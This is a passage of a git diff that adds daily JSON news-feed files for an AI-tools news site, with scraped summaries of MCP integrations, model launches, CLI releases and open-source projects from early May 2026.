The gap is closing fast.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-01.json b/data/news-feed-2026-05-01.json new file mode 100644 index 0000000..989f34e --- /dev/null +++ b/data/news-feed-2026-05-01.json @@ -0,0 +1,265 @@ +{ + "generated": "2026-06-05T00:44:37.161Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-01", + "article_count": 15, + "archived_story_count": 600, + "articles": [ + { + "title": "Built + open sourced anti-slopsquatting CLI", + "url": "https://reddit.com/r/ClaudeAI/comments/1t0ltr5/built_open_sourced_antislopsquatting_cli/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "cli_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-01T06:56:08.000Z", + "summary": "TL;DR: built an open source CLI that scans your repository's manifest (package.json, requirements.txt, go.mod) files for indicators of slopsquatting or other supply chain attack indicators.\n\nRepo: https://github.com/zhendahu/dep-doctor\n\nThere's been a ton of supply chain attacks recently ([Axios](https://github.com/axios/axios/issues/10636), [LiteLLM](https://www.trendmicro.com/en_us/research/26/c/inside-litellm-supply-chain-compromise.html), [Trivy](https://www.paloaltonetworks.com/blog/cloud-s", + "category": "ai_tools" + }, + { + "title": "Vercel CLI @vercel/python-workers@0.0.21 released", + "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.21", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.62, + "date": "2026-05-01T22:29:33.000Z", + "summary": "### Patch Changes\n\n- 6935baa: Refactor Python queue sdk into `_queue/`\n- 574c9f1: [vercel-workers] Replaces retention_seconds 
and delay_seconds with retention and delay which support timedelta, e.g retention=timedelta(hours=6)\n", + "category": "ai_tools" + }, + { + "title": "Bonkers. Also, told y’all! OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterpri…", + "url": "https://x.com/firstadopter/status/2050264818972516799", + "source": "X / @firstadopter", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-01T17:23:19.000Z", + "summary": "Bonkers. Also, told y’all! OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterprise demand for agentic coding tools..”", + "category": "ai_tools" + }, + { + "title": "One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic codi…", + "url": "https://x.com/OpenAI/status/2050250926888468929", + "source": "X / @openai", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-01T16:28:07.000Z", + "summary": "One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic coding tools keeps climbing.", + "category": "ai_tools" + }, + { + "title": "Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). 
What makes this annou This is the kind of move that separates the builders from the watchers.", + "url": "https://x.com/yunara97/status/2050108352550592636", + "source": "X / @yunara97", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-01T07:01:35.000Z", + "summary": "Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). What makes this annou This is the kind of move that separates the builders from the watchers.", + "category": "ai_tools" + }, + { + "title": "Hermes Agent Is Now in LM Studio — The Open-Source Agent Ecosystem Is Growing Fast", + "url": "https://x.com/NousResearch/status/2049878944007041210", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-01T02:15:34.945Z", + "summary": "Hermes Agent's integration with LM Studio brings it to one of the most popular local model runners. 
The open-source agent ecosystem is maturing quickly.", + "category": "ai_tools" + }, + { + "title": "Whohas – Command-line utility for cross-distro, cross-repository package search", + "url": "https://github.com/whohas/whohas", + "source": "Hacker News", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.99, + "date": "2026-05-01T15:01:08.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Cloud Skills Are Still Just Skills - How Anthropic no longer releases new skills, and gates them within the Cloud now with Ultraplan, Ultrareview, and Cloud Security.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t0wlme/cloud_skills_are_still_just_skills_how_anthropic/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-05-01T15:26:45.000Z", + "summary": "https://vexjoy.com/posts/cloud-skills-are-still-just-skills/\n\nThe skill ecosystem’s strength is composability. I can take a review skill, pair it with a Go agent, wrap it in a pipeline that saves artifacts at phase boundaries. I can inspect every piece. When something fails, I can diagnose it because I can read the prompts. 
You can’t compose what you can’t read, and you can’t diagnose failures in a stage you can’t inspect.\n\nIf Anthropic ships more features this way, the ecosystem splits into ope", + "category": "ai_tools" + }, + { + "title": "Found Zero day Claude Desktop + Chromium bug need to know where to submit report.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t0u20d/found_zero_day_claude_desktop_chromium_bug_need/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 0.7, + "date": "2026-05-01T13:52:27.000Z", + "summary": "Looking for official link / process to submit a vulnerability report for a high-risk official Claude Desktop + Chrome extension + native host + Cowork/MCP configuration that can become RAT-equivalent if a session, prompt chain, same-user process, or enabled extension is abused. \n\nPlease let me know where I can submit this report.", + "category": "ai_tools" + }, + { + "title": "Example of using the GodotIQ MCP with Coding Agent to create video games", + "url": "https://reddit.com/r/ClaudeAI/comments/1t0q8bf/example_of_using_the_godotiq_mcp_with_coding/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "agent_tool" + ], + "importance": 0.7, + "date": "2026-05-01T11:04:05.000Z", + "summary": "I’ve developed an MCP server for Godot. Most coding agents in Godot today work blindly: they read files but don’t know where the nodes are in space, don’t understand the signals, and don’t see what calls what. Godotiq solves this, giving the agent a true understanding of the 2D/3D scene, the code, and the editor.\n\nTo test it, I gave it some free assets I found online and a prompt, and let it run for about an hour. 
It produced a mini twin-stick survivors-style game with waves, bosses, power-up ca", + "category": "ai_tools" + }, + { + "title": "Mobile App with Clade", + "url": "https://reddit.com/r/ClaudeAI/comments/1t0obje/mobile_app_with_clade/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 0.7, + "date": "2026-05-01T09:19:51.000Z", + "summary": "Just a quick question. Is building a mobile app like this actually a legit approach? I recently came across someone building fairly complex web apps, for example a geo quiz with full database integration, using this workflow: He generates all the HTML, CSS and JS through Claude (the AI), deploys it to Netlify, connects a database like Supabase or Firebase, and then uses \"Add to Homescreen\" so it looks and feels like a native mobile app. No framework, no GitHub repo, no CI/CD, no app store. And h", + "category": "ai_tools" + }, + { + "title": "Turbo v2.9.7 released", + "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.7", + "source": "GitHub Releases · Turbo", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.7, + "date": "2026-05-01T02:50:31.000Z", + "summary": "\n\n## What's Changed\n### eslint\n* chore: Upgrade dependencies to resolve their known vulnerabilities by @anthonyshew in https://github.com/vercel/turborepo/pull/12604\n### Examples\n* feat(sandbox): Bump @vercel/sandbox from v1 to beta by @marc-vercel in https://github.com/vercel/turborepo/pull/12595\n* chore: Update examples to Turbo 2.9.6 by @cursor[bot] in https://github.com/vercel/turborepo/pull/12600\n* examples", + "category": "ai_tools" + }, + { + "title": "Got tired of flying blind on Claude.ai usage, built a browser extension that surfaces token counts, cache timers, and rate limits", + "url": 
"https://reddit.com/r/ClaudeAI/comments/1t0ti7h/got_tired_of_flying_blind_on_claudeai_usage_built/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.62, + "date": "2026-05-01T13:30:04.000Z", + "summary": "I kept hitting the 5-hour limit out of nowhere and had no idea how close I was to the context window filling up mid-conversation. The fact that [Claude.ai](http://Claude.ai) shows you basically nothing about your actual usage drove me nuts, especially when I'd be deep in a long chat and suddenly get cut off.\n\n\n\nSo I built a Chrome extension that adds a small dashboard to [claude.ai](http://claude.ai) showing real-time token counts per message, total context used, the prompt cache window timer (s", + "category": "ai_tools" + }, + { + "title": "You can now connect your Meta ads to Claude via MCP. Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate th…", + "url": "https://x.com/_stephenbishop_/status/2050263244020015404", + "source": "X / @_stephenbishop_", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-05-01T17:17:04.000Z", + "summary": "You can now connect your Meta ads to Claude via MCP. 
Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate them > Re-launch on Meta", + "category": "ai_tools" + }, + { + "title": "VEED Launches AI Video Creation Tools — Helping Creators Produce at Scale", + "url": "https://x.com/veedstudio", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-01T14:45:55.101Z", + "summary": "VEED continues developing AI video creation tools enabling content creators to produce polished video content at scale without professional editing expertise. The platform targets the growing market for AI-assisted video content creation for social and marketing applications.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-02.json b/data/news-feed-2026-05-02.json new file mode 100644 index 0000000..acfd8ba --- /dev/null +++ b/data/news-feed-2026-05-02.json @@ -0,0 +1,273 @@ +{ + "generated": "2026-06-05T00:44:37.317Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-02", + "article_count": 15, + "archived_story_count": 459, + "articles": [ + { + "title": "@WesRoth: Meta Launches Ads MCP — Claude and ChatGPT Can Now Manage Meta Ad Accounts", + "url": "https://x.com/WesRoth/status/2050606311440531809", + "source": "Aligned News (Scoble)", + "tags": [ + "mcp", + "product_launch", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "mcp", + "product_launch", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-02T16:23:29.285Z", + "summary": "Meta launched its Ads MCP and CLI, creating a direct bridge for frontier AI models like Claude and ChatGPT to access and interact with the Meta Ads ecosystem through natural language.", + "category": "ai_tools" + }, + { + "title": "I built a Claude Code skill that 
gives Claude real local time + session tracking (open source, one-line install)", + "url": "https://reddit.com/r/ClaudeAI/comments/1t1xoca/i_built_a_claude_code_skill_that_gives_claude/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-02T18:27:13.000Z", + "summary": "Built this with Claude Code over a few sessions open sourcing it. Claude has no built-in clock. Each session starts cold, training data is frozen in time, and when Claude says \"the current time\" it's hallucinating. Got tired of correcting it, so I built time-anchor. **What it does:** \\- Auto-detects your timezone on install, no API key, no network call \\- Reads the host system clock when you ask for the time (the trick: Python scripts in the skill can read the OS clock when Claude executes them via bash, Claude itself stays clockless, but it now has a tool it can query) \\- Logs every session start/end so Claude can answer \"how long have we been talking\" or \"what did I say 20 minutes ago\" \\- Persists in a local JSON file (or shares with another memory plugin via $TIME\\_ANCHOR\\_MEMORY\\_PATH) \\- \\~85% of users get auto-detected (Windows tzutil, Linux /etc/localtime, $TZ). The remaining 15% type a city/country and get a paginated picker \\- covering \\~200 countries with their full IANA zone lists. Free + open source. MIT licensed, no telemetry, all state local. No paid tier, nothing to sign up for. 
#### Install (any OS, no git, no SSH, no plugin marketplace setup): **Windows (PowerShel…", + "category": "ai_tools" + }, + { + "title": "Parallelogram – a strict linter for LLM fine-tuning datasets (catches broken data before your GPU run starts)", + "url": "https://reddit.com/r/StableDiffusion/comments/1t1sf5z/parallelogram_a_strict_linter_for_llm_finetuning/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "open_source", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-02T15:07:24.000Z", + "summary": "Fine-tuning frameworks assume your data is correctly formatted. None of them enforce it. The result is broken training runs discovered after the compute is spent.\n\nParallelogram is a CLI tool that validates fine-tuning datasets before any training starts. Strict hard-blocks on role sequence errors, empty turns, context window violations, duplicates, and mojibake. Exits 0 on clean data, exits 1 on errors — CI/CD friendly.\n\nApache 2.0, local-first, zero network calls.\n\ngithub.com/Thatayotlhe04/Par", + "category": "creative_tools" + }, + { + "title": "Tried running Claude Code with local LLMs via Ollama — ended up subscribing to Pro anyway. But now I can't disconnect from the local server.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t1vjd0/tried_running_claude_code_with_local_llms_via/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-02T17:07:21.000Z", + "summary": "I've been experimenting with using Ollama to run Claude Code locally with models like Gemma 4, thinking I could avoid API costs. However, I quickly realised these models aren't really optimised for Claude Code's agentic workflows — they tend to get stuck in thinking loops and don't follow Claude Code's expected output structure well. 
So I ended up subscribing to Claude Pro anyway. The problem now is that even after logging into my Anthropic account through the terminal, Claude Code still connects to the local Ollama server no matter how many times I restart the terminal or VSCode. Just wondering how this can be solved, and also is it possible to run both local LLMs and claude models at the same time?", + "category": "ai_tools" + }, + { + "title": "Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. Archite…", + "url": "https://x.com/HudBeer/status/2050622456436818111", + "source": "X / @hudbeer", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-02T17:04:26.000Z", + "summary": "Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. 
Architecture wins.", + "category": "ai_tools" + }, + { + "title": "Weekly Meal Planning Fully Automated with Claude and Migros MCP", + "url": "https://x.com/hslu_aiml/status/2049100936287498456", + "source": "Aligned News (Scoble)", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-05-02T16:28:06.379Z", + "summary": "A developer automated their weekly meal plan entirely using Claude and Migros's MCP integration, demonstrating how AI agents can handle grocery and meal planning end-to-end.", + "category": "ai_tools" + }, + { + "title": "@ValsAI: GPT-5.5 Now #1 on Terminal Bench 2 — Updated Results Show +11% Improvement", + "url": "https://x.com/ValsAI/status/2050240263420072446", + "source": "Aligned News (Scoble)", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-02T16:21:16.690Z", + "summary": "Vals AI updated GPT-5.5's results and it is now the #1 model on Terminal Bench 2, improving by +11%. It remains #2 on the overall Vals Index.", + "category": "ai_tools" + }, + { + "title": "I built \"Semvec\": A Constant-Cost Semantic Memory for LLMs (Looking for testers!)", + "url": "https://reddit.com/r/ClaudeAI/comments/1t1ti3q/i_built_semvec_a_constantcost_semantic_memory_for/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-02T15:49:05.000Z", + "summary": "Hey everyone, If you build LLM applications, autonomous agents, or just use Claude/Cursor for coding, you've probably hit this wall: Conversation history grows infinitely, token costs explode, latency skyrockets, and eventually, the LLM starts forgetting early context anyway. To fix this, I built semvec. 
It replaces unbounded conversation histories with a fixed-size semantic state combined with a tiered, content-aware memory (short/medium/long-term). The result: The cost and latency of every LLM call stay constant. Turn 10 and Turn 10,000 carry the exact same input footprint. In 48-turn benchmarks, it yields roughly a 76% token reduction while retaining all structured access to decisions, error patterns, and prior context. Here is what you get: \\- Constant-size compressed context: Token-reduced LLM context that stops growing. \\- Tiered memory with selective forgetting: Frequently accessed older memories outlive never-touched newer ones. \\- Drop-in chat proxy: Wrap any OpenAI-compatible LLM (vLLM, Ollama, OpenRouter) and get compressed context for free. \\- Coding-agent compaction (MCP): Persistent memory across coding sessions. It comes with an MCP server for Claude Code & Curs…", + "category": "ai_tools" + }, + { + "title": "The OpenAI Prompting Guide Has Been Updated. 🙌🏻 Check It Out 👏🏻", + "url": "https://reddit.com/r/ChatGPT/comments/1t1tgok/the_openai_prompting_guide_has_been_updated_check/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-05-02T15:47:33.000Z", + "summary": "A great resource for learning how to prompt better and get the most out of ChatGPT 5.5: https://developers.openai.com/api/docs/guides/prompt-guidance?model=gpt-5.5 🤙🏻", + "category": "ai_tools" + }, + { + "title": "I reverse-engineered the Perplexity app and built an MCP that turns your Perplexity/Comet account into a Claude MCP, so Claude can search like crazy and read 200+ sources in one answer with your personal account subscription without API product needed. 
[Experiment - Educational Purpose]", + "url": "https://reddit.com/r/ClaudeAI/comments/1t1pdqc/i_reverseengineered_the_perplexity_app_and_built/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-02T13:05:38.000Z", + "summary": "Here's video showcase: [***https://youtu.be/wErgEe9Pgqo***](https://youtu.be/wErgEe9Pgqo)", + "category": "ai_tools" + }, + { + "title": "Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base t…", + "url": "https://x.com/genondemand3d/status/2050539325763293222", + "source": "X / @genondemand3d", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-02T11:34:07.000Z", + "summary": "Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base training and mcp and hopefully it'll grow", + "category": "ai_tools" + }, + { + "title": "xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. 
The release emphasizes real-tim…", + "url": "https://x.com/mehedi_u/status/2050462001571504588", + "source": "X / @mehedi_u", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-02T06:26:51.000Z", + "summary": "xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. The release emphasizes real-time speed, targeting developers building", + "category": "ai_tools" + }, + { + "title": "Hermes Just Beat Claude Code in GitHub Stars and Nobody Is Talking About It", + "url": "https://x.com/aakashgupta/status/2050349093969694825", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-01T23:49:55.116Z", + "summary": "Braygent highlights the Hermes GitHub star milestone as the underreported open source AI agent story of the week, arguing it signals a turning point in open versus closed AI competition.", + "category": "ai_tools" + }, + { + "title": "Pika Just Let You Give Claude a Face and Make Videos Through Conversation", + "url": "https://x.com/pika_labs/status/2050294291998933455", + "source": "Aligned News (Scoble)", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-05-01T23:49:55.116Z", + "summary": "Braygent highlights the Pika MCP as a genuinely new Claude integration category that gives the assistant a custom identity and full video production capabilities, not just tool access.", + "category": "ai_tools" + }, + { + "title": "NVIDIA's Open Source Enterprise AI Agent Security Layer Is More Important Than People Realize", + "url": "https://x.com/NVIDIAAI/status/2050336285428998202", + "source": "Aligned News (Scoble)", + 
"tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-01T23:49:55.116Z", + "summary": "Braygent argues NVIDIA's open source OpenShell is the infrastructure unlock for enterprise AI agent deployment, with the open source design being crucial for security team auditability.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-03.json b/data/news-feed-2026-05-03.json new file mode 100644 index 0000000..d4165b8 --- /dev/null +++ b/data/news-feed-2026-05-03.json @@ -0,0 +1,247 @@ +{ + "generated": "2026-06-05T00:44:37.493Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-03", + "article_count": 15, + "archived_story_count": 379, + "articles": [ + { + "title": "EasyUI – built over many months, late nights, and real dedication. Now 100% open-source.", + "url": "https://reddit.com/r/StableDiffusion/comments/1t2toa5/easyui_built_over_many_months_late_nights_and/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-03T18:40:22.000Z", + "summary": "• Run ComfyUI workflows (txt2img, img2img, img2vid, vid2vid and more) • Execute Python scripts • Chat with LLMs (Ollama) • Templates & favorite templates • Plugin system • Tag system, wildcards, chants • Mask editor & crop tool • Drawing & coloring tools (inpaint) • Sessions management • Dark mode & login system • Media upload (drag & drop) • Audio trimming & txt2voice • Multi-language (Arabic, English, Chinese, Japanese) • Edit & resend prompts • Regenerate & resend images • Negative prompt support • And much more... Made with effort. Released with love. 
🔗 [https://github.com/kigy1/EasyUI]", + "category": "creative_tools" + }, + { + "title": "Hermes Agent Hit 100K GitHub Stars — The Fastest-Growing Open-Source AI Agent Has Won the Community", + "url": "https://x.com/Shaughnessy119/status/2042339593647800404", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-03T14:53:59.070Z", + "summary": "Braygent argues Hermes Agent's 100K GitHub stars represent a clear developer community vote for reliability over feature velocity, with implications for how all AI developer tools should prioritize update stability.", + "category": "ai_tools" + }, + { + "title": "Vibe coded and made a Knights of New Order like free open sourced tool for proof-checking deepbooru tags", + "url": "https://reddit.com/r/StableDiffusion/comments/1t2kou2/vibe_coded_and_made_a_knights_of_new_order_like/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-03T12:54:04.000Z", + "summary": "\\--- **Deepbooru TagWalker Beta** **---** **Most tagging tools out there are image-centric** — you open an image, then edit its tags. TagWalker flips that around. You pick a tag. The program walks you through every image in your dataset, one by one, and asks: does this image have this tag correctly applied? Yes or No. Then it moves to the next image automatically. By the time you finish a tag, you've seen it against every single image in your dataset — consistently, in sequence, without losing your place. No clicking around. No forgetting which images you already checked. \\--- This is the program I had always wished existed. The program works the very similar way to **Knights of New Order** minigame on civit.AI. My first time ever vibe coding project with Qwen 3.6 27B Q4 on RTX 3090. 
Not as easy as I initially thought. Program is uploaded on github under MIT license. [https://github.com/Elliezrah/deepbooru-tagwalker/releases](https://github.com/Elliezrah/deepbooru-tagwalker/releases) Let me know what you think.", + "category": "creative_tools" + }, + { + "title": "OpenClaw v2026.5.2 released", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.5.2", + "source": "GitHub Releases · OpenClaw", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.91, + "date": "2026-05-02T23:37:55.000Z", + "summary": "\n### Highlights\n\n- External plugin installation, update, doctor repair, dependency reporting, and artifact metadata now cover the npm-first cutover, stale configured installs, missing package payloads, and beta-channel plugin fallback. Thanks @vincentkoc.\n- Gateway and agent hot paths are leaner across startup, session listing, task maintenance, prompt prep, plugin loading, tool descriptor planning, filesystem guards, and large runtime configs.\n- Control UI and WebChat are more resilient across ", + "category": "ai_tools" + }, + { + "title": "pnpm v11.0.4 released", + "url": "https://github.com/pnpm/pnpm/releases/tag/v11.0.4", + "source": "GitHub Releases · pnpm", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.84, + "date": "2026-05-02T23:32:37.000Z", + "summary": "## Patch Changes\r\n\r\n* Fixed `pnpm ci` not reinstalling workspace package `node_modules` directories after the clean step [#11427](https://github.com/pnpm/pnpm/issues/11427).\r\n* Remove pnpm's workspace state file when cleaning node\\_modules so `pnpm ci` performs a fresh install after the clean step.\r\n* Do not remove `pnpm-lock.yaml` during `pnpm clean` when `lockfile: true` is configured in `pnpm-workspace.yaml`. 
The lockfile is only removed when the `--lockfile` option is passed to `pnpm clean`.", + "category": "ai_tools" + }, + { + "title": "Turbo v2.9.8 released", + "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.8", + "source": "GitHub Releases · Turbo", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.7, + "date": "2026-05-03T02:41:00.000Z", + "summary": "\n\n## What's Changed\n### @turbo/repository\n* chore: Update to Rust 1.95.0 by @ognevny in https://github.com/vercel/turborepo/pull/12636\n### Changelog\n* release(turborepo): 2.9.7 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12679\n* test: Add regression for gitignored output restore by @anthonyshew in https://github.com/vercel/turborepo/pull/12681\n* docs: Clarify root task guidance by @anthon", + "category": "ai_tools" + }, + { + "title": "Open Source AI Agents | Github/Repo List | [2025] Feb 21, 2025 • 31", + "url": "https://huggingface.co/blog/tegridydev/open-source-ai-agents-directory", + "source": "Hugging Face Blog", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-03T18:00:42.827Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "Built this over the weekend because dataset prep was annoying af", + "url": "https://reddit.com/r/StableDiffusion/comments/1t2sb82/built_this_over_the_weekend_because_dataset_prep/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-03T17:50:27.000Z", + "summary": "I’ve been working on my startup and had to train diffusion models for animations. Realized the worst part is not training, it’s the dataset prep. Especially with stuff like LTX models where things have to follow specific rules like frame counts (8n+1) and resolution constraints. 
You take random clips and almost nothing fits directly, so you end up trimming, resizing, fixing frames, adding captions… just a lot of repetitive work. So I built a tool for myself over the weekend to deal with it. It’s fully open source. Runs local-first with a simple UI + FastAPI backend, uses FFmpeg underneath. You basically drop your raw videos and it just handles all that stuff. Checks what’s wrong, fixes it, lets you tweak things if needed, and gives you a clean dataset ready for training. Also gives you a good level of control across the whole pipeline, so you’re not locked into rigid preprocessing. It also has bulk captioning feature across the dataset. Currently it supports LTX and WAN, and I’ll be adding support for more models soon. Been using it myself and it made things way smoother, so putting it out. Also I keep building similar small open source tools like this and putting them out. You’ll…", + "category": "creative_tools" + }, + { + "title": "I made an easy to use OPEN SOURCE, beautiful UI wrapper for ComfyUI without the node graph", + "url": "https://reddit.com/r/StableDiffusion/comments/1t2s1yp/i_made_an_easy_to_use_open_source_beautiful_ui/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-03T17:40:48.000Z", + "summary": "soo I got into local ai image generation and saw that there was no truly simple generators that just had beautiful views for generating images, no complex stuff, so I decided to make my own and open source it of course on github the backend is fully comfyUI, but it has no node graphs, it just uses it because I love the backend and it works much easier then anything else for this I would love to have people review and contribute/find issues for this, heres some images of it but basically its called J AI Studio, and ive stripped it back to be as simple yet still great as possible, for anyone new to ai image gen OR just people 
